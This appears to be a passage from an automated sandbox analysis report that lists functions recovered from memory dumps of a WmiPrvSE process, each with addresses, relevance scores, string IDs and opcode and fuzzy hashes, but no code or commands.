              • String ID: "$+$/$]
              • API String ID: 0-387013541
              • Opcode ID: 0aaa483b33cea8ad6999e080954f85a3de31984d38780b329e0a7fa5a542ca4b
              • Instruction ID: 2b0b2580bab97eaf025b1e0ed880e4f8746d776e9b37c48f09f86f0a49c7ff92
              • Opcode Fuzzy Hash: 0aaa483b33cea8ad6999e080954f85a3de31984d38780b329e0a7fa5a542ca4b
              • Instruction Fuzzy Hash: 5151E3B0D1562DCFEB69DB64C894BE9B7B2FF48301F1041A9D40DA7291DB39AA85CF00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF406E7 Relevance: 5.1, Strings: 4, Instructions: 88COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: "$)$+$/
              • API String ID: 0-3570642953
              • Opcode ID: 9d47cc7c6f9f8f284273e54773ea8e5c4d859b6bd83d8c4631c5d020c2de061a
              • Instruction ID: 134295bf36de4a38f15a8cbcdfa849805eeb7f0279f2e256f2e2264616af025a
              • Opcode Fuzzy Hash: 9d47cc7c6f9f8f284273e54773ea8e5c4d859b6bd83d8c4631c5d020c2de061a
              • Instruction Fuzzy Hash: 8D41C8B0D0922D8FDB69DF24C9987F9B7B1BF54305F1041AAD44DA7291CB399A88DF01
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40A47 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: &$/$[${
              • API String ID: 0-2536217607
              • Opcode ID: 457a6003c20e08f06fb1bc7589a9ee0d80fbc19394496472fa401207ef97e16d
              • Instruction ID: 61a702b30058154427464b06aad7668b7eef38b300493da55ff6c92ba1ae9d37
              • Opcode Fuzzy Hash: 457a6003c20e08f06fb1bc7589a9ee0d80fbc19394496472fa401207ef97e16d
              • Instruction Fuzzy Hash: A63184B0D0922A8BEB6DCF74D9987BDB6B2AF48315F10417ED41EA7281CB395984DF04
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              Function 00007FFBACF3EE6E Relevance: 6.3, Strings: 5, Instructions: 73COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000018.00000002.465819599.00007FFBACF3E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3E000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3e000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: !$3$A$]$k
              • API String ID: 0-237419272
              • Opcode ID: 4ed21f01810f28e839933c5dc948fa3bafa8f8c08764cc0de8ff81975f4ea77f
              • Instruction ID: a2562dd371ac6718599d3681c550b8856a093a80e6418307e7d9c770a9ac0ff6
              • Opcode Fuzzy Hash: 4ed21f01810f28e839933c5dc948fa3bafa8f8c08764cc0de8ff81975f4ea77f
              • Instruction Fuzzy Hash: 6231F8B0D0A62A8BDBA9DF24C8997E9B7B1EF54310F0041E9D55DA7381CB35AE84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3EC8D Relevance: 6.3, Strings: 5, Instructions: 60COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000018.00000002.465819599.00007FFBACF3E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3E000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3e000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: #$3$A$[$k
              • API String ID: 0-610135868
              • Opcode ID: 0166d72d2d2425c56ee383e5f9523df1833d9d6fed42b4a8471d3729c6deac92
              • Instruction ID: 92250d0c23ac8262f7813c9acc6c17bf683d6995c93b51f104a21ef7bd1cd09c
              • Opcode Fuzzy Hash: 0166d72d2d2425c56ee383e5f9523df1833d9d6fed42b4a8471d3729c6deac92
              • Instruction Fuzzy Hash: 9B21ECB0D0962D8BEB69DF25C8557E977B1BF54300F0041ADD81DA6381CB79AE84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C3AD Relevance: 1.4, Strings: 1, Instructions: 173COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: $K~
              • API String ID: 0-2883342327
              • Opcode ID: 9de682389cbf51f26719d87ce3778a86b5da02907fb7c664dafe38920de6a85d
              • Instruction ID: bb3718279078a3428a96e4b962511770c454d17d3d66c334a6b2c2db0e922f59
              • Opcode Fuzzy Hash: 9de682389cbf51f26719d87ce3778a86b5da02907fb7c664dafe38920de6a85d
              • Instruction Fuzzy Hash: E64185B7D1862A5AEB51BB7DF4050FE77D0DF81331F000637D698C9092DB25B48A9AE4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C35D Relevance: 1.4, Strings: 1, Instructions: 154COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: $K~
              • API String ID: 0-2883342327
              • Opcode ID: 594943056593f0f9abb9387cc0282bb75712c1f5ae5dd63d05f735205797d572
              • Instruction ID: 1e284e2e2bd71ed353c02597b48371164e795ad4af7ed029813af4160fb44145
              • Opcode Fuzzy Hash: 594943056593f0f9abb9387cc0282bb75712c1f5ae5dd63d05f735205797d572
              • Instruction Fuzzy Hash: 4841B4B7D0862A56EB52BB7DF4050FA7BD0DF81331F000636D658C5092DF25B48A9AA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF44CA2 Relevance: .7, Instructions: 716COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 063f1e94d75a9c03f9022cc88b67360a00d42917d21cdace5fdee5a87b178d28
              • Instruction ID: c332a06a9562dd701dd6d0fd548a206fcc0bf1eee0e24e0a952cdcebd840cab1
              • Opcode Fuzzy Hash: 063f1e94d75a9c03f9022cc88b67360a00d42917d21cdace5fdee5a87b178d28
              • Instruction Fuzzy Hash: A0A148B2A0DA5A0FDB56EB3CD4985F57BE1EF46311B0401BBD549C71A3CE1AEC4A8780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42BF5 Relevance: .4, Instructions: 414COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 097681c86cf756af4035a85a0096d0f7f5e572e24e2c97221e5b77b490679a4b
              • Instruction ID: 881cf80ea470eb3dcb221e8738752e8b9e1e6205438c605404052aa5ef7c2a14
              • Opcode Fuzzy Hash: 097681c86cf756af4035a85a0096d0f7f5e572e24e2c97221e5b77b490679a4b
              • Instruction Fuzzy Hash: B8C1BBEBD0E1A50BE713A77DB8A51E97F90DF42331B4400B7D688CA097DE19D84E86A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42C83 Relevance: .3, Instructions: 341COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5c6aa8569b7101d6af6ae117a91ff348e6c4a5002fe35b046a10e562b6dc2960
              • Instruction ID: 4d769fa411a530119e457b2da7d759051cbb25c2c5595502b6915ec8b95fdb26
              • Opcode Fuzzy Hash: 5c6aa8569b7101d6af6ae117a91ff348e6c4a5002fe35b046a10e562b6dc2960
              • Instruction Fuzzy Hash: 6FA1DAEBD0E2A50BE713A77CB8A51E56F90DF41370B4400B7D688CA097EE19DD4E8291
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42CAA Relevance: .3, Instructions: 316COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9db88452dc820359416067452b3b0645b67072b44d6337852b48e4677c0a682
              • Instruction ID: 6100305be119c43a2148ac90cc8c0566dc2c7ef58cdecba487d24a204edaae05
              • Opcode Fuzzy Hash: a9db88452dc820359416067452b3b0645b67072b44d6337852b48e4677c0a682
              • Instruction Fuzzy Hash: 2D91DBEBD0E2A60FE753A77CB8A51E56F90DF41270B4400B7D588CA097EE19DD4E8391
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4468D Relevance: .3, Instructions: 258COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fb8de8042839cb4594562b545569ad137ce75accec53e0779dcc5009b2817dc3
              • Instruction ID: 5e87854b70de5f8454a12af479a6dc4a9cf255b5207abc51e1e18e7fecbb7bd1
              • Opcode Fuzzy Hash: fb8de8042839cb4594562b545569ad137ce75accec53e0779dcc5009b2817dc3
              • Instruction Fuzzy Hash: 6D8160B0909A5D8FDB95EB78C8996AD7BF0FF59310F1001AAD40EE7292DE35A845CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42F95 Relevance: .2, Instructions: 220COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e6d04ffa684554472ee3a5cc226ff8ea7030281a054d1bdd76de2e31f69c6042
              • Instruction ID: 6495dce27baebe0fe26f48f6f53ed7855cf807fcbb945e3d6a1867f3f3b3d046
              • Opcode Fuzzy Hash: e6d04ffa684554472ee3a5cc226ff8ea7030281a054d1bdd76de2e31f69c6042
              • Instruction Fuzzy Hash: CB91F9B0D19A1D8EEB95EF78C9987ADB6B1FF58300F1045B9D40DE3292DB359988CB10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3BCE9 Relevance: .2, Instructions: 215COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32d79eb15db54fe3fcd8c8826b725e1533082f8200e1fd2c7bf2329258bd59e4
              • Instruction ID: 11cc3d2bf708ab2dba9f0407d200de842058b0b90a8fe5506215d2e7bcb21b1d
              • Opcode Fuzzy Hash: 32d79eb15db54fe3fcd8c8826b725e1533082f8200e1fd2c7bf2329258bd59e4
              • Instruction Fuzzy Hash: 2B7107B0D1951D9EEB95DBB8C4A86ECB7B1FF59300F5001BAD41DE3292DE35A8858B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3351F Relevance: .2, Instructions: 214COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7dfac3b4ac40a64271d77cd61c56d60ce41747242088c63e6e2e4afce2715b12
              • Instruction ID: 58734acdabc1eee6f803be9a2988d12aa7baee14d82a545f3ed4368e1681a8d7
              • Opcode Fuzzy Hash: 7dfac3b4ac40a64271d77cd61c56d60ce41747242088c63e6e2e4afce2715b12
              • Instruction Fuzzy Hash: E371C1B2E1895D8FEB84DB6CE8557ECBBE1EF5A350F40017AC10DD3396DAA91806CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32035 Relevance: .1, Instructions: 146COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0d355d7de90c790f6425816177fb08b3188038148caacc1682065c831d2bec1c
              • Instruction ID: e8d2067861c033803f477370dd1407a912fb314f5ef9ff0f8a3331f0ddec084e
              • Opcode Fuzzy Hash: 0d355d7de90c790f6425816177fb08b3188038148caacc1682065c831d2bec1c
              • Instruction Fuzzy Hash: E74123F1A0D65A5FE746EB38D4891F87BE0EF45300F0501B6D82DC72A3DE2AE84A8341
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF318F4 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: af46e27fb9476c00cbb7315cb767367c7113da65fc65a68bd9af554f684d406d
              • Instruction ID: 05f1ee2c779854811f6c562637bda571aefcf823f6b3e210694ae43301f10a8f
              • Opcode Fuzzy Hash: af46e27fb9476c00cbb7315cb767367c7113da65fc65a68bd9af554f684d406d
              • Instruction Fuzzy Hash: CD41B270B187498FCB4DDE28C8954BA77E1FB98714B14857DD89AC3396CE35E812C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C450 Relevance: .1, Instructions: 134COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a36aa3db3b69fb9b973ff76324ad221b34588ab294a726b065d0507d0e407836
              • Instruction ID: cc885b95372c2de196719ecda263e6c9277f2ecda86cac85e7cdce653136598f
              • Opcode Fuzzy Hash: a36aa3db3b69fb9b973ff76324ad221b34588ab294a726b065d0507d0e407836
              • Instruction Fuzzy Hash: FE41CAF6D0962A5AEB92BB7DE4080FD7BD0EF54321F000636D91DC5192DF26B48E96B0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF41E4D Relevance: .1, Instructions: 126COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0c0ec44794452c368909ab281ef202cf174cd029acbf9326a8778c3e53407b93
              • Instruction ID: 2540d21981f3b756ad13d251a88696221b165dbb77362db93239b3cc9f302d43
              • Opcode Fuzzy Hash: 0c0ec44794452c368909ab281ef202cf174cd029acbf9326a8778c3e53407b93
              • Instruction Fuzzy Hash: 72415CB4D1962D8FEB45EBA8C899AEDB7B1FF58300F400179D509E3292CF386805CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42B30 Relevance: .1, Instructions: 120COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3c24becce95e9513393e5546f1a04afc7ce4c9276c95ddc63b92f0a01dd0be61
              • Instruction ID: c94710223edf48e93cc04940599bbb53954c041e48caab3509420a22b054454e
              • Opcode Fuzzy Hash: 3c24becce95e9513393e5546f1a04afc7ce4c9276c95ddc63b92f0a01dd0be61
              • Instruction Fuzzy Hash: 7431B277E0852E4ADB10FBBCF4551EA77A0EF55332F00043BE689D6192DF24A8898B94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF330F5 Relevance: .1, Instructions: 117COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 35adfd6c350fc6031554dd05492a0ea551952ec0d11f700b752f5db182aad765
              • Instruction ID: cbbd954dc747bb7400d12aa590a08d4b934799f2e8aec3a408f9d8a55aa0804f
              • Opcode Fuzzy Hash: 35adfd6c350fc6031554dd05492a0ea551952ec0d11f700b752f5db182aad765
              • Instruction Fuzzy Hash: 7E417DF0D0A50A9FEB55EB78C4586FD77B1EF55300F01113AD819A6382DE3AE94E8B50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3CE29 Relevance: .1, Instructions: 113COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d00e32f0a74c8a95f973ec12faa96627a669ef8945d97a70680f7580ccf665cc
              • Instruction ID: a3322275ad57ce62c9ea6e3f7e58d5d600431ae0410d5d278d2cf4232354eecd
              • Opcode Fuzzy Hash: d00e32f0a74c8a95f973ec12faa96627a669ef8945d97a70680f7580ccf665cc
              • Instruction Fuzzy Hash: B2414AB0D0A6199FDB51DFB5C8486EDB7F0EF18311F104276E818E7292DB39A948DB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42B48 Relevance: .1, Instructions: 108COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be29b02938f47a1dda6715ea3afb2230f683e5b5bf9808abaa08381b30095eb5
              • Instruction ID: 402c0004eaf63718c7c7448c83484f944145c63b886b7c4ebb8589607f241677
              • Opcode Fuzzy Hash: be29b02938f47a1dda6715ea3afb2230f683e5b5bf9808abaa08381b30095eb5
              • Instruction Fuzzy Hash: BE31AF76E0852E4ADB50FBBCF8151EE77A0EF55321F10043BE689D6192DF24A8898B94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF322C7 Relevance: .1, Instructions: 94COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a32b3e0b368ed2f043c69e242d5b26d0150ac8c8116c2396d858f99cd914da46
              • Instruction ID: ef2d6f28cf46391597d720d452c237078c20b2be8cb28d5d819c173caa8c4510
              • Opcode Fuzzy Hash: a32b3e0b368ed2f043c69e242d5b26d0150ac8c8116c2396d858f99cd914da46
              • Instruction Fuzzy Hash: F0313FF1D0A51A9BEB65DB30DC487FCB3B1BF05300F5041B9C86D96392DE79A9488B04
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42B70 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e2b6038894865a1838e7342b2154ccd781b49aa5bec2bf3c5b637bf3ebc28eee
              • Instruction ID: f62cdf5d513b37567ab83dbfd2d4235efc43312e02d3021c1e60758990595d2b
              • Opcode Fuzzy Hash: e2b6038894865a1838e7342b2154ccd781b49aa5bec2bf3c5b637bf3ebc28eee
              • Instruction Fuzzy Hash: 5921A176E0852E4ADF50FFBCE8451EE77E1EF58321F10043BE689D6182DF24A4898B94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C458 Relevance: .1, Instructions: 89COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f49b61ba35edaa5bfcc8e7c52dd2b96273e42fde19b4a2af0785f57e5f4db578
              • Instruction ID: 42f3670799c205a40c82fbbfcded8155c4560f190b4e4f7fe0dc43f31baa24b8
              • Opcode Fuzzy Hash: f49b61ba35edaa5bfcc8e7c52dd2b96273e42fde19b4a2af0785f57e5f4db578
              • Instruction Fuzzy Hash: 2221EAF6D0966B5AEB92BB7DE4080FE3BD0EF40320F000636D91CC5192DF25B48D96A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420D0 Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1152ae809a4dfa78c7252e7bf4eb2bc3a52fc504ed4414f628ed3e075e1fac18
              • Instruction ID: 47e33c6ac8d107923f3e0be9e938d059ed492a3b270e65ed83e95d6b9ea1a9ca
              • Opcode Fuzzy Hash: 1152ae809a4dfa78c7252e7bf4eb2bc3a52fc504ed4414f628ed3e075e1fac18
              • Instruction Fuzzy Hash: 6721DEFAA0951D8BE751FB7CD98A1F97BA0EF85321F0504BBCA08C7052DA25E54A8790
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4239A Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b8c6ef45a34945ef6e4549cde486bf03ad087c04fa943c60f5a2ddc2cddbc8a9
              • Instruction ID: 5002979ba6e299cc6a06d51626494ac9fdb32efe9d9c394f3edf2575b63b1565
              • Opcode Fuzzy Hash: b8c6ef45a34945ef6e4549cde486bf03ad087c04fa943c60f5a2ddc2cddbc8a9
              • Instruction Fuzzy Hash: 883182B4D1462D8FEB54EBA8C885BADB7B1BF59301F504179D50CE3292CA346989CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF41930 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 231f96e892407b2accb547d655471bce5c3584c1d8fae775a27747e763f72633
              • Instruction ID: fa062428aad86762b747d4f688cf0183a214b3d6b4a9f1b982bf6c7bfbd65511
              • Opcode Fuzzy Hash: 231f96e892407b2accb547d655471bce5c3584c1d8fae775a27747e763f72633
              • Instruction Fuzzy Hash: 5D2196B188E3C94FDB579B708C695E53FB09F17200F0940EFD48AC74A3D9695559C352
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3A0E1 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4ae8102400916175b87556d3f84de9e2a6311a3d752cd3017ca1e1db53ec05a4
              • Instruction ID: 9feaa4c547310433195256117bd6ee29482a3852471b79050fe55059d557340d
              • Opcode Fuzzy Hash: 4ae8102400916175b87556d3f84de9e2a6311a3d752cd3017ca1e1db53ec05a4
              • Instruction Fuzzy Hash: B02181B0918A4D8FDB89EF68C4995ED3BF0FF68305F0101AAE819D7291DB35E445CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42BC0 Relevance: .1, Instructions: 68COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2a3ca635dbc39339b8735e27e664c8d76de4d25c766a74bcfe2a23dc7c8f84ec
              • Instruction ID: 53539a138fedbab04dfb79b043160a5bfc48ffa4b121fba10de2470bd544123e
              • Opcode Fuzzy Hash: 2a3ca635dbc39339b8735e27e664c8d76de4d25c766a74bcfe2a23dc7c8f84ec
              • Instruction Fuzzy Hash: B7116D7091892E8FDF58EFA8D4996FE77A1FF58300F50043AE50AE2191DE75A445CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3AA90 Relevance: .1, Instructions: 68COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8316a135ca334eeb0ba946ff94689ffb491108ffaa44e6db320af6525c4bd640
              • Instruction ID: b27b5dcf156a92ea52ad403385c3af14606db353437da98fb6f6a94f800f888c
              • Opcode Fuzzy Hash: 8316a135ca334eeb0ba946ff94689ffb491108ffaa44e6db320af6525c4bd640
              • Instruction Fuzzy Hash: 2E21FDE290964E9EEB56EBB8C84C0FD3FE0EF55300F0401B7D828D61A2EE24A8488750
              Uniqueness

              Uniqueness Score: -1.00%

